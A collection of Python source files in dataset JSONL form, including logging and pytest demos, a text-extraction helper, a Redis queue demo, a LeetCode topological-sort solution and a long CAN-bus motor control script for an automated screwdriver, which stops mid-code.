+{"seq_id":"20496372","text":"import logging\nimport logging.handlers\n\ndef loggingBasic():\n checkVal = input(\"input True or False:\")\n logging.basicConfig(filename='./log/test.log', level=logging.DEBUG)\n logging.info(\"==============================\")\n logging.debug(\"Debug\")\n logging.info(\"Announced Time\")\n logging.warning(\"Warning\")\n logging.error(\"Error\")\n logging.critical(\"Critical Error\")\n\n logging.info(\"==============================\")\n print(\"Retrieve\")\n\n if checkVal:\n print(\"checkVal:%s\"%checkVal)\n else:\n print(\"checkVal:%s\"%checkVal)\n logging.critical(\"Critical Error\")\n\n\ndef loggerBasic():\n print(\"loggerBasic()\")\n\n logger = logging.getLogger('mylogger')\n\n fileHandler = logging.FileHandler('./log/testLog.log')\n streamHandler = logging.StreamHandler()\n\n logger.addHandler(fileHandler)\n logger.addHandler(streamHandler)\n\n logger.setLevel(logging.DEBUG)\n logger.debug(\"===========================\")\n logger.info(\"TEST START\")\n logger.warning(\"스트림으로 로그가 남아요~\")\n logger.error(\"파일로도 남으니 안심이죠~!\")\n logger.critical(\"치명적인 버그는 꼭 파일로 남기기도 하고 메일로 발송하세요!\")\n logger.debug(\"===========================\")\n logger.info(\"TEST END!\")\n\ndef loggerIntermediate():\n print(\"\\n\\033[96mloggerIntermediate\\033[0m\")\n\n logger = logging.getLogger('mylogger')\n\n formatter = logging.Formatter('[%(levelname)s|%(filename)s] %(asctime)s > %(message)s')\n\n fileHandler = logging.FileHandler('./log/testLog.log')\n streamHandler = logging.StreamHandler()\n\n fileHandler.setFormatter(formatter)\n streamHandler.setFormatter(formatter)\n\n logger.addHandler(fileHandler)\n logger.addHandler(streamHandler)\n\n logger.setLevel(logging.DEBUG)\n logger.debug(\"\\033[96m===========================\")\n logger.info(\"TEST START\")\n logger.warning(\"스트림으로 로그가 남아요~\")\n logger.error(\"파일로도 남으니 안심이죠~!\")\n logger.critical(\"치명적인 버그는 꼭 파일로 남기기도 하고 메일로 발송하세요!\")\n logger.debug(\"\\033[96m===========================\\033[0m\")\n logger.info(\"TEST END!\")\n\n# loggerBasic()\nloggerIntermediate()","sub_path":"EXCode/loggingTest.py","file_name":"loggingTest.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"535232321","text":"import pytest\r\nimport os\r\nimport sys\r\n\r\nsys.path.append('E:/gitL/PycharmProjects/Reptile/autoTestDemo_pytest')\r\n\r\nfrom SourceCode.calc import Calculator\r\n\r\nimport allure\r\n\r\n'''\r\n-pytest命名规则\r\n .文件名要以test_开头\r\n .类名要以Test开头,首字母大写,方法名要以test_开头\r\n\r\n-Allure\r\n .Allure.attch()\r\n .Allure.attch.file()\r\n\r\n-Fixture固件,自定义用例预置条件,功能类似于setup、teardown,不过更为灵活\r\n .把固件名称当参数传入用例函数调用\r\n .默认级别是scope=function,每个函数可调用\r\n .scope=class,每个类可调用一次,scope=module,每个.py文件可调用一次,scope=session,多个.py文件调用一次\r\n .pytest会自动识别该文件,放在与用例同一package下,不需要导入\r\n'''\r\ntest_user_data2 = ['admin1', 'admin2']\r\n\r\n\r\n@pytest.fixture(scope=\"class\")\r\ndef fix():\r\n print('first run fixture')\r\n\r\n\r\n@pytest.fixture(scope=\"module\")\r\ndef par(request):\r\n param = request.param\r\n print('测试request获取作用在用例上的数据: %s' % param)\r\n yield param\r\n\r\n\r\nclass TestCalc:\r\n\r\n @classmethod\r\n def setup_class(cls):\r\n print(os.path.abspath('.'))\r\n print(os.path.abspath(__file__))\r\n print(sys.path)\r\n print('所有测试用例运行前执行')\r\n # assert os.path.abspath('.') in sys.path\r\n cls.calc = Calculator()\r\n\r\n def test_add(self, login):\r\n print('run add')\r\n assert 2 == self.calc.add(1, 1)\r\n\r\n def test_div(self, fix):\r\n print('run div')\r\n assert 3 == self.calc.div(9, 3)\r\n\r\n @pytest.mark.parametrize('a,b,c', [\r\n (1, 2, 3),\r\n (-1, -2, -3),\r\n (0.2, 0.2, 0.4),\r\n (1000, 2000, 3000),\r\n (0, 0, 0)\r\n ])\r\n def test_param(self, a, b, c):\r\n print(c)\r\n assert c == a + b\r\n\r\n def teardown(self):\r\n print('每个用例运行后执行')\r\n\r\n @classmethod\r\n def teardown_class(cls):\r\n print('所有测试用例运行完后执行')\r\n\r\n\r\nclass TestCalc1:\r\n @classmethod\r\n def setup_class(cls):\r\n print('所有测试用例运行前执行')\r\n cls.calc1 = Calculator()\r\n\r\n def test_add(self):\r\n print('run add2')\r\n assert 2 == self.calc1.add(1, 1)\r\n\r\n def test_div(self, fix):\r\n print('run div2')\r\n assert 3 == self.calc1.div(9, 3)\r\n\r\n @pytest.mark.parametrize('par', test_user_data2, indirect=True)\r\n def test_par(self, par):\r\n # 添加indirect=True参数是为了把par当成一个函数去执行,而不是一个参数\r\n # par函数获取test_user_data2数据\r\n param = par\r\n print(param)\r\n assert 'admin' in param\r\n","sub_path":"PycharmProjects/Reptile/autoTestDemo_pytest/Testing/test_calc.py","file_name":"test_calc.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"344484064","text":"from server import run_server\nfrom config import Config\nimport logging.config\n\nif __name__ == '__main__':\n logging.config.fileConfig('logging.conf')\n try:\n config = Config('server.conf')\n run_server(config)\n except Exception as e:\n logging.critical('Invalid configuration: \"{}\"'.format(e))\n exit(1)\n","sub_path":"server-for-calendar/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"558893014","text":"import re\n\nweb = [\"www.\", \"://\", \".com\", \".net\", \".org\", \".us\", \".gov\"]\naccepted_tags = [\"p\", \"span\", \"article\", \"font\", \"blockquote\"]\nexclude = [\"cite\"]\naccepted_classes = {\"paragraph\", \"text\"}\nbad_phrases = [\"back to top\", \"home\", \"welcome\", \"you are here:\", \"itunes\", \"google\", \"facebook\", \"twitter\", \"comment\"]\nbad_subphrases = [\"powered by\", \"around the web\", \"around the internet\", \"et al\", \"ndl\", \"view source\", \"view history\",\n \"edit links\", \"last modified\", \"text is available under\", \"creative commons\"]\nbad_headers = [\"References\", \"Citations\", \"Further Reading\", \"External Links\", \"Footnotes\", \"See Also\"]\na = lambda x: x == x.lower()\n\nA = re.compile(\"[a-zA-Z]{2,}[0-9]{2,}[ \\\\.]*\")\nB = re.compile(\"([0-9]+[a-zA-Z]+)+[\\\\s\\\\.]+\")\nC = re.compile(\"[\\\\[\\\\{].*[\\\\]\\\\}]\")\nD = re.compile(\"[A-Z]{2,3}: {0,2}[0-9]{3,}.{0,2}[0-9]*\")\nE = re.compile(\"\\\\([a-zA-Z\\\\s]+ ([0-9]+[.]*)+\\\\)\")\nF = re.compile(\"(\\\\\\\\[a-zA-Z0-9]{1,5})\")\ndef add_item(goods, parent):\n goods.append(parent)\n\n\ndef find_good(parent, goods, wiki_mode):\n if parent is not None:\n if not parent.__class__.__name__ == \"NavigableString\" and not parent.__class__.__name__ == \"Comment\":\n if hasattr(parent, \"name\"):\n if parent.name in accepted_tags:\n add_item(goods, parent)\n else:\n classes_proto = parent.get(\"class\")\n classes = set() if classes_proto is None else set(filter(a, classes_proto))\n ids_proto = parent.get(\"id\")\n # ids = set() if ids_proto is None else set(filter(a, ids_proto))\n # converts all lists of ids and classes to sets with their lowercase versions\n # ids are not currently used, but may be used later\n if bool(classes & accepted_classes):\n add_item(goods, parent)\n # if the class is an accepted class, add the item to the list\n else:\n if hasattr(parent, \"children\"):\n for item in parent.children:\n if hasattr(item, \"get_text\"):\n if not(item.name==\"a\" or item.parent.name==\"a\"):\n t = item.get_text().strip()\n if t in bad_headers:\n add_item(goods, None)\n return False\n find_good(item, goods, wiki_mode)\n # searches through the child's child nodes\n elif parent.__class__.__name__ == \"NavigableString\":\n add_item(goods, parent)\n\n\ndef decide(factors, threshold):\n totalWeight = 0\n totalValue = 0\n for value, weight in factors:\n totalValue += value * weight\n totalWeight += weight\n adjusted = totalValue / totalWeight\n return adjusted > threshold\n\n\ndef check(text):\n texts = text.split(\"\\n\")\n result = \"\"\n for item in texts:\n new = (checkIndividual(item) + \"\\n\")\n result += new\n return result\n\n\ndef checkIndividual(text):\n if \"°\" in text and len(text) < 100:\n return \"\"\n text = destroy_citations(text.replace(\"\\r\", \"\\n\"))\n stripped = text.lower().strip(\"\\n\").strip(\"\\t\").strip(\" \").strip(\"\\r\")\n if stripped in bad_phrases:\n return \"\"\n for item in bad_subphrases:\n if item in stripped:\n return \"\"\n for item in web:\n if item in text:\n text = text.replace(item, \"\")\n if len(stripped) < 7:\n return \"\"\n if not text[0].isalnum() and not text[0] == \" \" and not text[0] == \"/t\" and not text[0] == \"\\n\":\n return \"\"\n lastchr = stripped[len(stripped) - 1]\n if not lastchr.isalnum() and not (lastchr == \".\" or lastchr == \"?\" or lastchr == \" \"):\n return \"\"\n if stripped.isdigit():\n return \"\"\n endsWithPunc = 0 if stripped[len(stripped) - 1] == '.' else 1\n length = 1 / (len(stripped) - 6)\n numSpaces = 1 / (stripped.count(' ') + 1)\n if numSpaces > 1 / 3:\n return \"\"\n factors = [(endsWithPunc, 2), (length, 1), (numSpaces, 3)]\n if decide(factors, 0.4):\n return \"\"\n return text\n\n\ndef extract(item):\n result = \"\"\n if hasattr(item, \"children\"):\n for text in item.children:\n if not hasattr(text, \"name\") or not text.name in exclude:\n result += extract(text)\n elif hasattr(item, \"get_text\"):\n result = item.get_text()\n else:\n result = item\n return result.replace(\"\\n\", \" \")\n\n\ndef check_spaces(text):\n obj = re.compile(\"[\\\\s \\\\t\\\\n]{2,}]\")\n text = obj.sub(\" \", text)\n text = re.compile(\"[ ]{2,}\").sub(\" \", text)\n text = text.replace(\"\\n \", \"\\n\").replace(\" \\n\", \"\\n\")\n text = re.compile(\"[\\\\r\\\\n]{3,}\").sub(\"\\n\", text)\n return text\n\n\ndef destroy_citations(text):\n return A.sub(\" \", B.sub(\" \", C.sub(\"\", D.sub(\" \", E.sub(\" \", F.sub(\" \", text))))))\n\n\ndef get_text(soup):\n soup = soup.html\n wiki_mode = False\n if (\"wikipedia.org\" in str(soup)):\n wiki_mode = True\n goods = list()\n find_good(soup, goods, wiki_mode)\n text = \"\"\n for item in goods:\n if item is None:\n break\n extraction = extract(item)\n if extraction is not None:\n text += extraction + \"\\n\"\n text = check_spaces(text)\n text = check(text)\n text = check_spaces(text)\n #return text.split(BAD_STUFF)[0]\n return text\n","sub_path":"text_extraction.py","file_name":"text_extraction.py","file_ext":"py","file_size_in_byte":5544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"640095873","text":"# -*- coding:utf-8 -*-\n# @Time: 2019-09-16 20:20\n# @Author: duiya duiyady@163.com\n\n\ndef isPalindrome(x):\n if x < 0:\n return False\n x = str(x)\n i, j = 0, len(x)-1\n while i < j:\n if x[i] == x[j]:\n i = i + 1\n j = j - 1\n else:\n break\n if i < j:\n return False\n else:\n return True\n\n\nif __name__ == '__main__':\n print(isPalindrome(123))","sub_path":"src/main/num001_100/9_回文数.py","file_name":"9_回文数.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"182512816","text":"from setuptools import setup\n\nmeta = dict(\n name=\"envcrypt\",\n version=\"0.0.1\",\n py_modules=[\"envcrypt\"],\n author='Will Maier',\n author_email='will@simple.com',\n test_suite='tests',\n scripts=['scripts/envcrypt'],\n install_requires=[\n \"docopt\"\n ],\n)\n\nsetup(**meta)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"66608472","text":"from RedisQueue.redis_queue import RedisQueue\nimport configparser\nimport LogUtil\nfrom concurrent.futures import ProcessPoolExecutor\n\ndef InforLoadConfigUtil(config_file_name, segment_name):\n tmplist = []\n try:\n cf = configparser.ConfigParser()\n cf.read(config_file_name, encoding='utf-8')\n for item in cf.items(segment_name):\n tmplist.append(item[1])\n return tmplist\n except Exception as e:\n return None\n\n\ndef InitQueueConf(config_file_name, segment_name):\n redisConfig = InforLoadConfigUtil(config_file_name, segment_name)\n host, port, db = redisConfig\n return dict(host = host, port = int(port), db = int(db))\n\n\n\nif __name__=='__main__':\n \n config_file_name = \"config_startup.ini\"\n segment_name = \"redis\"\n redisConf = InitQueueConf(config_file_name, segment_name)\n request_segment_name = 'queue_request'\n request_segment_domain = InforLoadConfigUtil(config_file_name, request_segment_name)[0]\n q = RedisQueue('rq', **redisConf)\n # 处理队列\n q_handler = RedisQueue('handled', **redisConf)\n # 成功队列\n q_succeed = RedisQueue('succeed', **redisConf)\n # 错误队列1\n q_error1 = RedisQueue('error1', **redisConf)\n # 处理过程中错误队列1\n q_error1_handle = RedisQueue('error1:handle', **redisConf)\n # 成功时的错误队列1\n q_error1_succeed = RedisQueue('error1:succeed', **redisConf)\n # 错误队列2\n q_error2 = RedisQueue('error2', **redisConf)\n \n print('test')\n","sub_path":"Demo/RedisDemo.py","file_name":"RedisDemo.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"247724314","text":"import collections\nclass Solution:\n def alienOrder(self, words: List[str]) -> str:\n # case: ['z', 'z']\n edges = collections.defaultdict(list)\n inDegree = collections.defaultdict(int)\n zeroDegree = []\n # set('yuan') -> {'y', 'u', 'a', 'n'}\n all_letters = set(''.join(words))\n for i in range(1, len(words)):\n word1, word2 = words[i-1], words[i]\n len1, len2 = len(word1), len(word2)\n # find the first different letter. Don't forget to break!\n for j in range(min(len1, len2)):\n if word1[j] != word2[j]:\n inDegree[word2[j]] += 1\n edges[word1[j]].append(word2[j])\n break\n res = ''\n # find the zero degrees\n for letter in all_letters:\n if inDegree[letter] == 0:\n zeroDegree.append(letter)\n while zeroDegree:\n cur = zeroDegree.pop()\n res += cur\n for neighbor in edges[cur]:\n inDegree[neighbor] -= 1\n if inDegree[neighbor] == 0:\n zeroDegree.append(neighbor)\n return '' if len(res) != len(all_letters) else res\n\nprint(Solution().alienOrder([\"za\",\"zb\",\"ca\",\"cb\"]))\nprint(set('yuan'))\n","sub_path":"Facebook/269.py","file_name":"269.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"109872512","text":"# xz轴第六版,xz轴变为���度模式,添加限位和z轴传感器,记录运行数据,自学习\nimport os\nimport pytz\nimport sys\nimport json\nimport csv\nimport serial\nfrom time import sleep\nimport can\nfrom threading import Thread\nfrom gpiozero import LED, DigitalInputDevice\nimport time\n\nimport django\nfrom django.utils import timezone\nfrom django.db.models import Avg\n\nsys.path.append('..')\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"ScrewDriver.settings\")\n\ndjango.setup()\n\nfrom control.models import Records, ScrewConfig, Weight\n\n\ndef get_current_time(datetimenow=None, naive_datetime=False, customtimezone=None):\n timezone_datetime = datetimenow\n if datetimenow and not datetimenow.tzinfo:\n # change naive datetime to datetime with timezone\n # use timezone.localize will include day light saving to get more accurate timing\n timezone_datetime = pytz.timezone(os.environ.get('TZ')).localize(datetimenow)\n tz = None\n if customtimezone:\n try:\n tz = pytz.timezone(customtimezone)\n except:\n pass\n\n # convert to datetime with user local timezone\n converted_datetime = timezone.localtime(timezone_datetime or timezone.now(), tz)\n # return datetime converted\n return converted_datetime.replace(tzinfo=None) if naive_datetime else converted_datetime\n\n\nclass Motor:\n\n def __init__(self, can_channel, motor_id):\n \"\"\"\n Initialization of can motors\n :param can_channel:name of can device\n :param motor_id:can id of motor\n \"\"\"\n self.bus = can.interface.Bus(\n channel=can_channel, bustype='socketcan_ctypes')\n self.speed = 0\n self.now_speed = 0\n self.position = 0\n self.current = 0\n self.motor_id = motor_id\n self.weight = 0\n self.weight_z = 0\n self.left_limit = 0\n self.right_limit = 0\n self.up_limit = 0\n self.down_limit = 0\n self.ser = serial.Serial('/dev/ttyUSB0', baudrate=57600)\n self.refresh_run()\n\n def refresh_run(self):\n t = Thread(target=self.refresh, name='refresh_can')\n t.setDaemon(True)\n t.start()\n t2 = Thread(target=self.serial_refresh, name='refresh_serial')\n t2.setDaemon(True)\n t2.start()\n t3 = Thread(target=self.button_refresh, name='refresh_button')\n t3.setDaemon(True)\n t3.start()\n t4 = Thread(target=self.limit_refresh, name='refresh_limit')\n t4.setDaemon(True)\n t4.start()\n print('four thread ok~')\n\n def limit_refresh(self):\n left = DigitalInputDevice(6)\n right = DigitalInputDevice(13)\n up = DigitalInputDevice(26)\n down = DigitalInputDevice(19)\n while True:\n self.left_limit = left.value\n self.right_limit = right.value\n self.up_limit = up.value\n self.down_limit = down.value\n sleep(0.01)\n\n def button_refresh(self):\n b_out = DigitalInputDevice(27)\n b_in = DigitalInputDevice(17)\n bin_pre = 0\n bout_pre = 0\n while True:\n bin_now = b_in.value\n bout_now = b_out.value\n sleep(0.01)\n bin_now2 = b_in.value\n bout_now2 = b_out.value\n\n if bin_now and bin_now2:\n bin_now = 1\n else:\n bin_now = 0\n\n if bout_now and bout_now2:\n bout_now = 1\n else:\n bout_now = 0\n if bin_now and not bin_pre:\n print('power on ppp')\n poweron_p()\n elif bout_now and not bout_pre:\n print('power on nnn')\n poweron_n()\n elif not any([bin_now, bout_now]) and any([bin_pre, bout_pre]):\n sleep(0.1)\n print('poweroff...')\n # poweroff()\n else:\n pass\n bin_pre = bin_now\n bout_pre = bout_now\n sleep(0.3)\n\n def serial_refresh(self):\n p = LED(21)\n p.on()\n while True:\n self.ser.write([0x32, 0x03, 0x00, 0x50, 0x00, 0x02, 0xC4, 0x1A])\n sleep(0.05)\n weight_data = self.ser.read_all()\n try:\n weight = round(int('0x' + weight_data.hex()[10:14], 16) * 0.001, 3)\n if weight >= 10:\n weight = 0\n except Exception as e:\n print('errorsssssssssssss', e)\n weight = 0\n try:\n with open('weight.json', 'w') as f:\n json.dump({'weight': weight}, f)\n\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n\n if weight > config['n']:\n self.weight = weight\n # print('ssssssssssss> max s : {}'.format(weight))\n\n # protect io\n p.off()\n print('ppppppppppppp')\n sleep(0.1)\n p.on()\n except Exception as e:\n print('error ssss22222222', e)\n\n # get weight_z value\n self.ser.write([0x01, 0x03, 0x00, 0x50, 0x00, 0x02, 0xC4, 0x1A])\n sleep(0.05)\n weight_data_m = self.ser.read_all()\n try:\n weight_z = round(int('0x' + weight_data_m.hex()[10:14], 16) * 0.01, 3)\n if weight_z >= 10:\n # print('////////////>>>', weight_z)\n weight_z = 0\n except Exception as e:\n print('errorzzzzzzzzzzzzzz', e)\n weight_z = 0\n try:\n if weight_z > 1:\n self.weight_z = weight_z\n # print('zzzzzzzzzzzzzzzz> max z : {}'.format(weight_z))\n except Exception as e:\n print('error zzzzzz2222222222', e)\n\n def refresh(self):\n while True:\n data = self.bus.recv()\n if data.arbitration_id != 0x1b:\n continue\n data = data.data\n if data[3] > 0xee:\n now_speed = (data[3] - 0xff) * 256 + (data[2] - 0xff)\n else:\n now_speed = data[2] | (data[3] << 8)\n self.now_speed = now_speed\n self.current = data[0] | (data[1] << 8)\n self.position = data[4] | (data[5] << 8) | (data[6] << 16) | (data[7] << 24)\n # print(self.current, self.now_speed, self.position)\n direction = 1 if self.now_speed > 0 else -1\n # sleep(0.1)\n screw_data = {'speed': self.now_speed, 'current': self.current if self.current < 10000 else 0,\n 'direction': direction}\n with open('screw.json', 'w') as f:\n json.dump(screw_data, f)\n sleep(0.001)\n\n def send(self, aid, data):\n print(time.ctime() + 'can data {}'.format(data))\n msg = can.Message(arbitration_id=aid, data=data, extended_id=False)\n self.bus.send(msg, timeout=1)\n sleep(0.01)\n\n def speed_mode(self, speed):\n \"\"\"\n :param speed: integer, -255 to 255, speed of left motor, positive speed will go forward,\n negative speed will go backward\n :return:\n \"\"\"\n s_speed = speed & 0xff\n times = speed >> 8 & 0xff\n self.send(self.motor_id, [s_speed, times])\n\n\ndef poweron_p():\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n config.update({'power': 1, \"direction\": 1})\n with open('adjust_screw_config.json', 'w') as f:\n json.dump(config, f)\n\n\ndef poweron_n():\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n config.update({'power': 1, \"direction\": -1})\n with open('adjust_screw_config.json', 'w') as f:\n json.dump(config, f)\n\n\ndef poweroff():\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n config.update({'power': 0})\n with open('adjust_screw_config.json', 'w') as f:\n json.dump(config, f)\n\n\nclass MotorX:\n # None for direction ,0x23 => 1 0x24 => -1\n run_data = [0x00, 0x20, None, 0x00, 0x00, 0x00, 0x00, 0x03]\n stop_data = [0x00, 0x20, 0x25, 0x00, 0x00, 0x00, 0x00, 0x01]\n # None for speed level 1,2,3,4,5,6 - (32,16,8,4,2,1) 1 is slowest 6 is fastest\n set_speed_data = [0x00, 0x20, 0x33, None, 0x00, 0x00, 0x00, 0x0a]\n speed_level_mapping = [0x20, 0x10, 0x08, 0x04, 0x02, 0x01]\n\n def __init__(self, can_channel, motor_id):\n \"\"\"\n Initialization of can motors\n :param can_channel:name of can device\n :param motor_id:can id of motor\n \"\"\"\n self.bus = can.interface.Bus(\n channel=can_channel, bustype='socketcan_ctypes')\n self.motor_id = motor_id\n self.speed = 0\n self.now_speed = 0\n self.alive = False\n\n def send(self, aid, data):\n msg = can.Message(arbitration_id=aid, data=data, extended_id=False)\n self.bus.send(msg, timeout=1)\n sleep(0.01)\n\n def run(self, step, direction):\n # direction = 1 (left, down)\n # direction = -1 (right, up)\n # 7-14\n if step > 2147483647:\n raise ValueError(\"step parameter must be a int integer and between 0~2147483647\")\n if direction not in (-1, 1):\n raise ValueError(\"The dir can only be 0 or 1, clockwise: 0 anticlockwise: 1\")\n # deal with direction\n self.run_data[2] = 0x23 if direction == 1 else 0x24\n self.run_data[6] = (0xff000000 & step) >> 24\n self.run_data[5] = (0x00ff0000 & step) >> 16\n self.run_data[4] = (0x0000ff00 & step) >> 8\n self.run_data[3] = 0x000000ff & step\n self.send(self.motor_id, self.run_data)\n\n def stop(self):\n self.send(self.motor_id, self.stop_data)\n\n def set_speed_level(self, level):\n level -= 1\n self.set_speed_data[3] = self.speed_level_mapping[level]\n self.send(self.motor_id, self.set_speed_data)\n\n\nclass MotorZ:\n # None for direction ,0x23 => 1 0x24 => -1\n run_data = [0x00, 0x20, None, 0x00, 0x00, 0x00, 0x00, 0x03]\n stop_data = [0x00, 0x20, 0x25, 0x00, 0x00, 0x00, 0x00, 0x01]\n # None for speed level 1,2,3,4,5,6 - (32,16,8,4,2,1) 1 is slowest 6 is fastest\n set_speed_data = [0x00, 0x20, 0x26, None, 0x00, 0x00, 0x00, 0x02]\n\n def __init__(self, can_channel, motor_id):\n \"\"\"\n Initialization of can motors\n :param can_channel:name of can device\n :param motor_id:can id of motor\n \"\"\"\n self.bus = can.interface.Bus(\n channel=can_channel, bustype='socketcan_ctypes')\n self.motor_id = motor_id\n self.speed = 0\n self.now_speed = 0\n self.alive = False\n\n def send(self, aid, data):\n msg = can.Message(arbitration_id=aid, data=data, extended_id=False)\n self.bus.send(msg, timeout=1)\n sleep(0.01)\n\n def speed_mode(self, speed):\n # speed > 0 forward, speed < 0 backward, speed = 0 stop\n self.run_data[2] = 0x23 if speed > 0 else 0x24\n if speed > 0:\n self.run_speed_mode(speed)\n if speed < 0:\n self.run_speed_mode(-speed)\n if speed == 0:\n self.send(self.motor_id, self.stop_data)\n print('stopzzzzzzzzzzzzzzzzz')\n\n def run_speed_mode(self, speed):\n self.set_speed_data[6] = (0xff000000 & speed) >> 24\n self.set_speed_data[5] = (0x00ff0000 & speed) >> 16\n self.set_speed_data[4] = (0x0000ff00 & speed) >> 8\n self.set_speed_data[3] = 0x000000ff & speed\n self.send(self.motor_id, self.set_speed_data)\n sleep(0.05)\n self.send(self.motor_id, self.run_data)\n\n\ndef main():\n x = MotorX('can0', 0xc1)\n z = MotorZ('can0', 0xc2)\n x.set_speed_level(3)\n\n can_motors = Motor('can0', 0x13)\n n = 0\n i = 0\n # cycle times\n m = 0\n\n step = 0\n step_right = 0\n total = 0\n total_up = 0\n\n p = 0\n\n man_position = 0\n man_cycle = 0\n\n speed = 0.9\n direction = 1\n actual_speed = 50\n # speed2 should < 1000\n speed1 = 304\n speed2 = 500\n settle_speed = 0\n while True:\n\n try:\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n except Exception as e:\n print('config error', e)\n config = {\"speed\": 1, \"speed2\": 350, \"direction\": 1, \"n\": 1, \"n2\": 2, \"power\": 1, \"auto\": 1, \"position\": 0}\n # power 1 :on 0:off\n power = config['power']\n weight = config['n']\n weight2 = 2\n auto = config['auto']\n # default 0, values=1,2,3\n position = config['position']\n screw_type = 'test001'\n\n # i += 1\n # print('iiiiiiiii', i)\n\n if power == 1:\n\n if auto == 1:\n # pre-start\n r = 0\n p += 1\n while True:\n r += 1\n can_motors.speed_mode(0)\n sleep(0.5)\n\n if p != 1:\n break\n elif r >= 5:\n break\n settled_list = Records.objects.filter(screw_type='test001', is_settled=True).distinct() \\\n .aggregate(Avg('total_time'))\n if settled_list['total_time__avg']:\n avg_time = settled_list['total_time__avg']\n print('%%%%%%%%%%%%%avg_time', avg_time)\n else:\n record_list = Records.objects.filter(direction=1, d_weight__gt=0, total_time__gt=0,\n screw_type='test001').distinct().aggregate(Avg('total_time'))\n print('record_list==========', record_list)\n avg_time = record_list['total_time__avg'] if record_list['total_time__avg'] else 0.0\n if avg_time != 0.0:\n s_time = avg_time - 0.5\n print('sssssssssss_time', s_time)\n\n if s_time > 0:\n # first stage\n print('start...')\n z.speed_mode(speed2)\n if can_motors.weight_z > 1:\n print('can_motors.weight_z===========', can_motors.weight_z)\n record = Records()\n record.screw_type = screw_type\n record.speed = speed1\n record.direction = 1\n record.current = can_motors.current if can_motors.current < 10000 else 0\n record.config_weight = weight\n record.start_time = get_current_time()\n \n can_motors.speed_mode(speed1)\n sleep(s_time)\n\n z.speed_mode(0)\n # second stage\n print('actual_speeddddddddddddddd', actual_speed)\n while True:\n can_motors.speed_mode(actual_speed)\n record.actual_speed = actual_speed\n if can_motors.weight > weight:\n break\n if can_motors.weight > weight:\n print('can_motors.weight2222222222222', can_motors.weight)\n m += 1\n\n record.cycle = m\n record.weight = can_motors.weight\n record.d_weight = can_motors.weight - weight\n record.end_time = get_current_time()\n record.total_time = (record.end_time - record.start_time).total_seconds()\n if record.total_time - avg_time > 0.5:\n record.total_time = 0\n print('record.total_time&&&&&&&&&&&&&&', record.total_time)\n\n if record.d_weight > 3:\n print('cycle...up...')\n while True:\n z.speed_mode(-speed2)\n if can_motors.up_limit == 1:\n z.speed_mode(0)\n print('cycle...stop...')\n\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n config.update({'power': 0})\n with open('adjust_screw_config.json', 'w') as f:\n json.dump(config, f)\n break\n record.save()\n can_motors.weight = 0\n\n else:\n\n if record.d_weight > 1 and actual_speed > 5:\n actual_speed -= 5\n # if record.d_weight < 1:\n # record.is_settled = True\n # print('settled...')\n # actual_speed += 5\n else:\n record.is_settled = True\n print('settled...')\n record.save()\n can_motors.weight = 0\n\n print('here here...')\n sleep(4.5)\n # reverse\n can_motors.speed_mode(-speed1)\n z.speed_mode(-speed2)\n\n record = Records()\n record.screw_type = screw_type\n record.cycle = m\n record.speed = -speed1\n record.direction = -1\n record.current = can_motors.current if can_motors.current < 10000 else 0\n record.weight = can_motors.weight\n record.save()\n\n sleep(s_time)\n print('gaga')\n\n can_motors.speed_mode(0)\n can_motors.weight = 0\n z.speed_mode(-200)\n sleep(1.5)\n z.speed_mode(0)\n can_motors.weight_z = 0\n\n config_data = ScrewConfig()\n config_data.n = weight\n config_data.power = power\n config_data.direction = direction\n config_data.speed = speed1\n config_data.actual_speed = actual_speed\n config_data.cycle = m\n config_data.save()\n\n print('end...')\n sleep(2)\n\n print('again...')\n else:\n print('run time too short!!!')\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n config.update({'power': 0})\n with open('adjust_screw_config.json', 'w') as f:\n json.dump(config, f)\n else:\n print('initial...start...')\n z.speed_mode(speed2)\n if can_motors.weight_z > 1:\n record = Records()\n record.screw_type = screw_type\n record.speed = speed1\n record.direction = 1\n record.current = can_motors.current if can_motors.current < 10000 else 0\n record.config_weight = weight\n record.start_time = get_current_time()\n while True:\n can_motors.speed_mode(speed1)\n\n if can_motors.weight > weight:\n z.speed_mode(0)\n print('can_motors.weight>>>>>>>>>>>>', can_motors.weight)\n m += 1\n\n record.cycle = m\n record.weight = can_motors.weight\n record.d_weight = can_motors.weight - weight\n record.end_time = get_current_time()\n record.total_time = (record.end_time - record.start_time).total_seconds()\n record.save()\n print('record.total_time$$$$$$$$$$$$', record.total_time)\n\n if record.d_weight > 3:\n print('initial...up...')\n while True:\n z.speed_mode(-speed2)\n if can_motors.up_limit == 1:\n z.speed_mode(0)\n print('initial...stop...')\n\n with open('adjust_screw_config.json', 'r') as f:\n config = json.load(f)\n config.update({'power': 0})\n with open('adjust_screw_config.json', 'w') as f:\n json.dump(config, f)\n break\n can_motors.weight = 0\n else:\n print('initial...here here...')\n sleep(4.5)\n # reverse\n print('initial...haha...')\n can_motors.speed_mode(-speed1)\n z.speed_mode(-speed2)\n\n record = Records()\n record.screw_type = screw_type\n record.cycle = m\n record.speed = -speed1\n record.direction = -1\n 